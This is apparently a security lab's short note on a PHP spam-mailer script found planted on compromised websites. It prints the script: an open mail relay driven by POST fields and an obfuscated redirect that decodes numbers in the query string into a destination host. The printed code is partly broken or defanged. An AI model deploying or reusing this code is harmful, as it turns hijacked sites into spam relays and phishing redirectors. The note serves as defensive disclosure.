Yet another spam mailer

Labs Note

Here is a mailer script we recently found that appears to be designed to send spam emails.

These kind of scripts are pretty common, there are multiple variations but in most cases they are only designed to send spam. Accessing the file directly without passing a specific variable would cause it to just display a blank page which is used by spammers to hide the functionality of the script.

if ($_GET ['ch']) {
    echo "OK";
    exit ();

    $to = $_POST ['to'];
    $subject = stripslashes ( $_POST ['subj'] );
    $message = stripslashes ( $_POST ['mes'] );
    $headers = stripslashes ( $_POST ['headers'] );

    if (mail ( $to, $subject, $message, $headers )) {
        echo "Message sent successfully";
    } else {
        echo "An error occured";

if (! $_POST['to'] && ! $_GET ['ch'] && count($_GET) > 0) {
    $arr = array (
        1 => 'a',
            2 => 'b',
            3 => 'c',
            4 => 'd',
            5 => 'e',
            6 => 'f',
            7 => 'g',
            8 => 'h',
            9 => 'i',
            10 => 'j',
            11 => 'k',
            12 => 'l',
            13 => 'm',
            14 => 'n',
            15 => 'o',
            16 => 'p',
            17 => 'q',
            18 => 'r',
            19 => 's',
            20 => 't',
            21 => 'u',
            22 => 'v',
            23 => 'w',
            24 => 'x',
            25 => 'y',
            26 => 'z',
            27 => '.',
            28 => '1',
            29 => '2',
            30 => '3',
            31 => '4',
            32 => '5',
            33 => '6',
            34 => '7',
            35 => '8',
            36 => '9',
            37 => '0'

    $var = key ( $_GET );

    $var_arr = explode ( "-", $var );

    foreach ( $var_arr as $value ) {
        preg_match_all ( "~\d+~", $value, $matches );

        $value = implode ( "", $matches [0] );

        if ($value > sizeof ( $arr )) {
            for($i = $value; $i > sizeof ( $arr ); $i = $i - sizeof ( $arr )) {
                $value = $i;

            $value -= sizeof ( $arr );

        $string [.]= $arr [$value];

    $link = $string [.] $_GET [$var];

    header (  "Location: http://{$link}" );

If you see it on your site, you are likely compromised.

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